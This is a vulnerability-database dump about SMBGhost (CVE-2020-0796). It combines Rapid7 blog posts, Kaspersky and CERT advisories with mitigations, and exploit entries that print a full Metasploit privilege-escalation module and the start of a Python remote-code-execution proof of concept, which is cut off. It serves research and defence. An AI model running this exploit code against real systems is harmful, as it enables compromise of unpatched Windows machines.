[zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a mistake in the exploit for CVE-2021-21551 where the version fingerprinting is overly specific. Windows 10 build 18363 failed because it didn't match the explicit build number 18362. This PR changes the fingerprinting to use ranges to fix this problem.\n * [#15223](<https://github.com/rapid7/metasploit-framework/pull/15223>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- This updates the `exploit/windows/local/tokenmagic` module by fixing a crash that occurs on some targets and moves the target validation logic to earlier in the module.\n * [#15236](<https://github.com/rapid7/metasploit-framework/pull/15236>) from [Apeironic](<https://github.com/Apeironic>) \\- This adds an additional check to the Linux `checkvm` module to fix a bug where it was failing to identify certain Xen environments such as those used within AWS.\n * [#15240](<https://github.com/rapid7/metasploit-framework/pull/15240>) from [mcorybillington](<https://github.com/mcorybillington>) \\- This fixes a typo that was present in the template for GitHub pull requests.\n * [#15241](<https://github.com/rapid7/metasploit-framework/pull/15241>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Removes the previously prototyped `RHOST_HTTP_URL` module option and feature flag as it had blocking edge cases for being enabled by default. A new implementation is being investigated.\n * [#15262](<https://github.com/rapid7/metasploit-framework/pull/15262>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Improved `msfvenom` to only wrap output if the output is going to STDOUT.\n * [#15267](<https://github.com/rapid7/metasploit-framework/pull/15267>) from [e2002e](<https://github.com/e2002e>) \\- This fixes a bug that was present within the Shodan search module where certain queries would cause an exception to be raised while processing the results.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.45...6.0.46](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-05-19T10%3A47%3A33-05%3A00..2021-05-27T16%3A09%3A36-04%3A00%22>)\n * [Full diff 6.0.45...6.0.46](<https://github.com/rapid7/metasploit-framework/compare/6.0.45...6.0.46>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-05-28T15:42:16", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2021-21551"], "modified": "2021-05-28T15:42:16", "id": "RAPID7BLOG:D560044511D0D460EB8BD73E6B8C9EB7", "href": "https://blog.rapid7.com/2021/05/28/metasploit-wrap-up-113/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-29T14:42:12", "description": "![Trick or Treat! What We Can Learn from the Spookiest Vulnerabilities of the Year](https://blog.rapid7.com/content/images/2020/10/Trick-or-Treat--What-We-Can-Learn-from-the-Spookiest-Vulnerabilities-of-the-Year.jpg)\n\nSpooky season is in full swing, and we\u2019re not just talking about Halloween. [Security vulnerabilities](<https://www.rapid7.com/fundamentals/vulnerabilities-exploits-threats/>) can range from tiny errors to large-scale gaps in protection, and all have different consequences. We put together a list of some of the scariest vulnerabilities of the year (the tricks!) and the remediation solutions that can help you stay on guard in the future (the treats!).\n\n## [SMBghost](<https://attackerkb.com/topics/2LCXe3EPAZ/cve-2020-0796---smbghost?referrer=search>)\n\n![Trick or Treat! What We Can Learn from the Spookiest Vulnerabilities of the Year](https://blog.rapid7.com/content/images/2020/10/SMBGhost-1.png)\n\n**The Trick: **SMBghost is a [buffer overflow vulnerability](<https://blog.rapid7.com/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/>) when compression is enabled in Microsoft SMB Servers. The vulnerability is due to an error when the vulnerable software handles a maliciously crafted compressed data packet. A remote, unauthenticated attacker can exploit this to execute arbitrary code within the context of the application. Yikes!\n\nThe impact that the exploitation of this vulnerability has is very high, due to this having the ability to be exploited remotely and the sense that it grants system-level access in kernel mode. This vulnerability has also been deemed as wormable, which makes it a priority for attackers to utilize.\n\n**The Treat: **Though the attacker value is very high, most [AttackerKB](<https://attackerkb.com/topics/2LCXe3EPAZ/cve-2020-0796---smbghost>) users have noted that the vuln\u2019s exploitability is relatively low. Microsoft has since released a patch for this vulnerability and suggests that users take proper precaution when enabling compression within SMB. Now, with many knowledge workers still stuck at home thanks to the pandemic, and therefore not spending a lot of time hanging out in SMB-heavy environments, this sequestration might actually be limiting the value of this and other SMB vulnerabilities\u2014maybe working from home might actually be good for security!\n\n## [BlueGate](<https://attackerkb.com/topics/Er1dwnOh2a/windows-remote-desktop-gateway-rce-cve-2020-0609?referrer=search>)\n\n![Trick or Treat! What We Can Learn from the Spookiest Vulnerabilities of the Year](https://blog.rapid7.com/content/images/2020/10/BlueGateway-1.png)\n\n**The Trick: **A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs, view, change, or delete data, or create new accounts with full user rights. A ghost-like attacker messing with your data? Pretty spooky.\n\n**The Treat: **This ghost is probably going away with regular and timely security patches. Though it goes against expert advice to deploy right smack on the internet, maintainers of such servers just need to keep up on their patches in the same way a typical IIS administrator does. The Microsoft-issued update addresses the vulnerability by correcting how RD Gateway handles connection requests.\n\n## [Ripple20](<https://attackerkb.com/topics/EZhbaWNnwV/ripple20-treck-tcp-ip-stack-vulnerabilities?referrer=search>)\n\n![Trick or Treat! What We Can Learn from the Spookiest Vulnerabilities of the Year](https://blog.rapid7.com/content/images/2020/10/ripple20-1.png)\n\n**The Trick: **In June, security firm JSOF published research on a collection of 19 vulnerabilities in a low-level TP/IP software library developed by Trek, a company that has distributed embedded internet protocols since the \u201990s. The 19 vulnerabilities \u201caffect hundreds of millions of devices (or more),\u201d thanks to the ripple effect of the supply chain. Consider \u201c19\u201d to be quite the opposite of a magic number. The 19 vulnerabilities are not equal in their severity and potential impact and are likely to persist for some time. \n\n\n**The Treat: **Is there any good news? Well, the practical attacker value of this suite of vulnerabilities is, on the whole, relatively low. This is in large part because of the lack of attack scalability: Each attack will, in all likelihood, need to be tailor-made for the target device, and even the value of targeting specific devices is heavily dependent on device capabilities and the context in which that device is used. The Treck TCP/IP stack is geared toward low-resource devices, which makes the Ripple20 vulnerabilities significantly less likely to be targeted in resource-heavy attacks such as crypto-mining or ransomware campaigns. If users want to change course from a scary ending to a happy one, users are best served by applying detections at the edge and internal network level to filter out malformed TCP/IP packets, IP fragments, and other lesser-used networking features, where possible.\n\n## [Bad Neighbor](<https://attackerkb.com/topics/17lFRTT1DO/cve-2020-16898-aka-bad-neighbor-ping-of-death-redux>)\n\n![Trick or Treat! What We Can Learn from the Spookiest Vulnerabilities of the Year](https://blog.rapid7.com/content/images/2020/10/bad-neighbor-1.png)\n\n**The Trick:** Bad Neighbor is a remote code execution vulnerability that arises when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploits this vulnerability could gain the ability to execute code on the target server or client. The vulnerability has garnered broad attention as potentially wormable. This bad neighbor is probably someone who gives out wormable apples instead of candy.\n\n**The Treat: **You can\u2019t call the homeowners association on this one, but we recommend applying the patch for CVE-2020-16898 (Bad Neighbor) as soon as possible. For those who are unable to patch immediately, consider disabling ICMPv6 RDNSS as a workaround.\n\n## [RECON](<https://blog.rapid7.com/2020/07/14/pay-attention-to-your-sap-security/>)\n\n![Trick or Treat! What We Can Learn from the Spookiest Vulnerabilities of the Year](https://blog.rapid7.com/content/images/2020/10/recon-1.png)\n\n**The Trick: **This critical [SAP vulnerability (RECON)](<https://attackerkb.com/topics/JubO1RiVBP/cve-2020-6287-critical-vulnerability-in-sap-netweaver-application-server-as-java#rapid7-analysis>) from July affects the SAP NetWeaver Application Server (AS) Java component LM Configuration Wizard. Though a few months have passed since its publication, it\u2019s still a big deal, especially since exploit code is publicly available. Businesses rely on SAP for a wide variety of processes, capturing everything from financial data to business intelligence. Most organizations use it as a tool to manage compliance and ensure access is provisioned (and, more importantly, deprovisioned) with urgency. The critical component to this vulnerability is that it does not require authentication to exploit, meaning any SAP NetWeaver system with the vulnerable components exposed to the internet\u2014currently estimated to be at least 4,000\u2014can be trivially compromised to wreak havoc on business systems. _So, yeah, this one is big-time scary._\n\n**The Treat:** This trick feels more like a long con. And how do you unravel the layers and remediate a long con? Conversations should begin with IT by identifying which physical or virtual assets are affected. SAP NetWeaver serves as the base layer for many SAP products, so many applications and processes are likely affected. Understanding how many systems you need to apply this patch to will help you begin to communicate estimated downtime to the business. Treating vulnerabilities, especially severe ones like this, is an exercise in diplomacy, politics, and trade-offs. For some, this will require removing SAP\u2019s direct access to the internet. For others, it will require implementing WAF and/or IPS rules. CISA strongly recommends closely monitoring SAP NetWeaver AS for anomalous activity. SAP customers should be on the lookout for unusual processes spawned under the context of users that match the <sid>adm naming convention. File metadata may also be a good way to identify when SAP NetWeaver software spawns non-SAP binaries. Rapid7 also recommends ensuring that any web service does not run using a privileged account. For others, it will result in accepting the risk. The key message here is to sit down with all stakeholders, including business leaders, to get on the same page about the severity of this vulnerability, develop and activate a treatment plan, and make sure to have, at a minimum, detective controls in place to respond.\n\n## [SigRed](<https://attackerkb.com/topics/egp32neD6z/cve-2020-1350-windows-dns-server-remote-code-execution-sigred>)\n\n![Trick or Treat! What We Can Learn from the Spookiest Vulnerabilities of the Year](https://blog.rapid7.com/content/images/2020/10/sigred-1.png)\n\n**The Trick: **A remote code execution vulnerability codenamed \u201cSigRed\u201d exists in Windows Domain Name System servers when they fail to properly handle requests. Successful exploitation can result in domain administrator privileges, compromising critical business data, assets, and infrastructure. If that wasn\u2019t scary enough, Homeland Security decided to get involved. The U.S. Department of Homeland Security issued an emergency directive on July 16, 2020 requiring federal agencies to patch or mitigate the vulnerability within 24 hours\u2014only the third time CISA\u2019s current director has taken such an action. As with any vulnerability known to be wormable, CVE-2020-1350, or SigRed, will make an attractive target for ransomware campaigns in addition to stealthier threat actors.\n\n**The Treat: **CISA put out urgent guidance to those who have Windows servers running DNS: patch on an emergency basis. Microsoft released guidance on mitigations for those who cannot patch, but as with other recent high-severity, high-urgency vulnerabilities, it is highly recommended that defenders prioritize patching over mitigation wherever possible. When attacker value is this high, don\u2019t just run for the hills\u2014instead, follow the rules and prioritize patching to keep monsters out of your servers.\n\n## [Curveball](<https://blog.rapid7.com/2020/01/16/cve-2020-0601-windows-cryptoapi-spoofing-vulnerability-what-you-need-to-know/>)\n\n![Trick or Treat! What We Can Learn from the Spookiest Vulnerabilities of the Year](https://blog.rapid7.com/content/images/2020/10/curveball-1.png)\n\n**The Trick: **In January,** **a flaw [(CVE-2020-0601 or Curveball)](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-0601>) was found in the way the Microsoft Windows CryptoAPI performs certificate validation, allowing attackers to spoof X.509 vulnerabilities. This is core cryptographic functionality used by a number of different software components, with far-reaching impact ranging from programming languages to web browsers.\n\n**The Treat: **This year started out with a fright, but there are some silver linings. The mitigation steps taken by Microsoft and others (e.g., Google Chrome) to detect and alert users to exploitation attempts are a welcome development for defenders and users. Windows Update services were not affected by this due to extended hardening in years past, showing that defense-in-depth is important for maintaining critical infrastructure. This vulnerability also highlights a specification flaw that software projects should heed: Untested features are likely vulnerable features. Because this vulnerability is in an extremely seldom-used feature of the TLS specification that allows users to specify their own elliptical curves, it meant the feature was largely untested. Vulnerability hunters and defenders may be on the lookout for similar bugs in other TLS implementations in the future.\n\nIt\u2019s Halloween, not April fools, and these vulnerabilities are no joke. As with any security scare, it\u2019s important not only to remediate, but to reflect on what we can learn from these mistakes. If you\u2019re looking for more visibility into which of these vulnerabilities is present in your organization, learn more about [our vulnerability management tool, InsightVM](<https://www.rapid7.com/products/insightvm/>).\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2020-10-29T13:59:06", "type": "rapid7blog", "title": "Trick or Treat! What We Can Learn from the Spookiest Vulnerabilities of the Year", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0601", "CVE-2020-0609", "CVE-2020-0796", "CVE-2020-1350", "CVE-2020-16898", "CVE-2020-6287"], "modified": "2020-10-29T13:59:06", "id": "RAPID7BLOG:E36C557104ECB6E144C21C3C499B0492", "href": "https://blog.rapid7.com/2020/10/29/trick-or-treat-what-we-can-learn-from-the-spookiest-vulnerabilities-of-the-year/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2022-01-19T18:15:56", "description": "### *Detect date*:\n03/12/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nA remote code execution vulnerability in Windows SMBv3 Client/Server can be exploited remotely via specially crafted packet to execute arbitrary code.\n\n### *Exploitation*:\nThis vulnerability can be exploited by the following malware:\n\n### *Affected products*:\nWindows 10 Version 1909 for 32-bit Systems \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1903 for 32-bit Systems \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-0796](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0796>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2020-0796](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796>)7.5Critical\n\n### *KB list*:\n[4551762](<http://support.microsoft.com/kb/4551762>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-12T00:00:00", "type": "kaspersky", "title": "KLA11693 ACE vulnerability in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-01-18T00:00:00", "id": "KLA11693", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11693/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2021-09-28T17:49:57", "description": "### Overview\n\nMicrosoft SMBv3 contains a vulnerability in the handling of compression, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. This vulnerability is being referred to as \"SMBGhost and CoronaBlue.\"\n\n### Description\n\nMicrosoft Server Message Block 3.1.1 (SMBv3) contains a vulnerability in the way that it handles connections that use compression. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. It has been reported that this vulnerability is \"wormable.\"\n\n### Impact\n\nBy connecting to a vulnerable Windows machine using SMBv3, or by causing a vulnerable Windows system to initiate a client connection to a SMBv3 server, a remote, unauthenticated attacker may be able to execute arbitrary code with SYSTEM privileges on a vulnerable system.\n\n### Solution\n\n**Apply an update**\n\nThis issue has been addressed in the [Microsoft update for CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>). Please also consider the following workarounds:\n\n**Disable SMBv3 compression** \n \nAccording to [Microsoft Security Advisory ADV200005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005>) :\n\n \n_You can disable compression to block unauthenticated attackers from exploiting the vulnerability against an SMBv3 Server with the PowerShell command below._ \n \n`_Set-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" DisableCompression -Type DWORD -Value 1 -Force_` \n \n_Notes:_ \n \n1\\. _No reboot is needed after making the change._ \n2\\. _This workaround does not prevent exploitation of SMB clients._ \n \n_You can disable the workaround with the PowerShell command below._ \n \n`_Set-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" DisableCompression -Type DWORD -Value 0 -Force_` \n**Block inbound and outbound SMB** \n \nConsider blocking outbound SMB connections (TCP port 445 for SMBv3) from the local network to the WAN. Also ensure that SMB connections from the internet are not allowed to connect inbound to an enterprise LAN.\n\n### Acknowledgements\n\nThis document was written by Will Dormann.\n\n### Vendor Information\n\n872016\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Microsoft Affected\n\nUpdated: 2020-06-19 **CVE-2020-0796**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 7.8 | E:POC/RL:OF/RC:C \nEnvironmental | 7.8 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2020-0796 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2020-0796>) \n---|--- \n**Date Public:** | 2020-03-10 \n**Date First Published:** | 2020-03-11 \n**Date Last Updated: ** | 2020-06-04 21:26 UTC \n**Document Revision: ** | 28 \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-11T00:00:00", "type": "cert", "title": "Microsoft SMBv3 compression remote code execution vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-06-04T21:26:00", "id": "VU:872016", "href": "https://www.kb.cert.org/vuls/id/872016", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-18T23:40:46", "description": "A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself before injecting a payload into winlogon.exe.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-04-06T00:00:00", "type": "zdt", "title": "Microsoft Server Message Block 3.1.1 (SMBv3) Compression Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-04-06T00:00:00", "id": "1337DAY-ID-34206", "href": "https://0day.today/exploit/description/34206", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::Remote::AutoCheck\n\n def initialize(info={})\n super(update_info(info, {\n 'Name' => 'SMBv3 Compression Buffer Overflow',\n 'Description' => %q{\n A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to\n execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself\n before injecting a payload into winlogon.exe.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Daniel Garc\u00eda Guti\u00e9rrez', # original LPE exploit\n 'Manuel Blanco Paraj\u00f3n', # original LPE exploit\n 'Spencer McIntyre' # metasploit module\n ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Targets' =>\n [\n #[ 'Windows 10 x86', { 'Arch' => ARCH_X86 } ],\n [ 'Windows 10 v1903-1909 x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'References' =>\n [\n [ 'CVE', '2020-0796' ],\n [ 'URL', 'https://github.com/danigargu/CVE-2020-0796' ],\n [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005' ]\n ],\n 'DisclosureDate' => '2020-03-13',\n 'DefaultTarget' => 0,\n 'AKA' => [ 'SMBGhost', 'CoronaBlue' ],\n 'Notes' =>\n {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n },\n }))\n end\n\n def check\n sysinfo_value = sysinfo[\"OS\"]\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return Exploit::CheckCode::Safe\n end\n\n build_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i\n vprint_status(\"Windows Build Number = #{build_num}\")\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /10/ && (build_num >= 18362 && build_num <= 18363)\n print_error('The exploit only supports Windows 10 versions 1903 - 1909')\n return CheckCode::Safe\n end\n\n disable_compression = registry_getvaldata(\"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\",\"DisableCompression\")\n if !disable_compression.nil? && disable_compression != 0\n print_error('The exploit requires compression to be enabled')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo[\"Architecture\"] =~ /wow64/i\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n elsif sysinfo[\"Architecture\"] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo[\"Architecture\"] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n print_status('Launching notepad to host the exploit...')\n notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})\n begin\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n # Reader Sandbox won't allow to create a new process:\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0796', 'CVE-2020-0796.x64.dll')\n library_path = ::File.expand_path(library_path)\n\n print_status(\"Injecting exploit into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\n encoded_payload = payload.encoded\n payload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Payload injected. Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "sourceHref": "https://0day.today/exploit/34206", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-25T11:21:29", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-06-02T00:00:00", "type": "zdt", "title": "Microsoft Windows - (SMBGhost) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-06-02T00:00:00", "id": "1337DAY-ID-34504", "href": "https://0day.today/exploit/description/34504", "sourceData": "#!/usr/bin/env python\n'''\n# EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48537.zip\n\n# SMBGhost_RCE_PoC\n\nRCE PoC for CVE-2020-0796 \"SMBGhost\"\n\nFor demonstration purposes only! Only use this a reference. Seriously. This has not been tested outside of my lab environment. It was written quickly and needs some work to be more reliable. Sometimes you BSOD. Using this for any purpose other than self education is an extremely bad idea. Your computer will burst in flames. Puppies will die. \n\nNow that that's out of the way....\n\nUsage ex: \n\n``` \n$SMBGhost_RCE_PoC python exploit.py -ip 192.168.142.131\n[+] found low stub at phys addr 13000!\n[+] PML4 at 1ad000\n[+] base of HAL heap at fffff79480000000\n[+] ntoskrnl entry at fffff80645792010\n[+] found PML4 self-ref entry 1eb\n[+] found HalpInterruptController at fffff79480001478\n[+] found HalpApicRequestInterrupt at fffff80645cb3bb0\n[+] built shellcode!\n[+] KUSER_SHARED_DATA PTE at fffff5fbc0000000\n[+] KUSER_SHARED_DATA PTE NX bit cleared!\n[+] Wrote shellcode at fffff78000000a00!\n[+] Press a key to execute shellcode!\n[+] overwrote HalpInterruptController pointer, should have execution shortly...\n```\n\nReplace payload in USER_PAYLOAD in exploit.py. Max of 600 bytes. If you want more, modify the kernel shell code yourself. \n\nlznt1 code from [here](https://github.com/you0708/lznt1). Modified to add a \"bad compression\" function to corrupt SRVNET buffer\nheader without causing a crash.\n\nSee this excellent write up by Ricera Security for more details on the methods I used: \nhttps://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html\n'''\n\nimport sys\nimport socket\nimport struct\nimport argparse\n\nfrom lznt1 import compress, compress_evil\nfrom smb_win import smb_negotiate, smb_compress\n\n# Use lowstub jmp bytes to signature search\nLOWSTUB_JMP = 0x1000600E9\n# Offset of PML4 pointer in lowstub\nPML4_LOWSTUB_OFFSET = 0xA0\n# Offset of lowstub virtual address in lowstub\nSELFVA_LOWSTUB_OFFSET = 0x78\n# Offset of NTOSKRNL entry address in lowstub\nNTENTRY_LOWSTUB_OFFSET = 0x278\n\n# Offset of hal!HalpApicRequestInterrupt pointer in hal!HalpInterruptController\nHALP_APIC_REQ_INTERRUPT_OFFSET 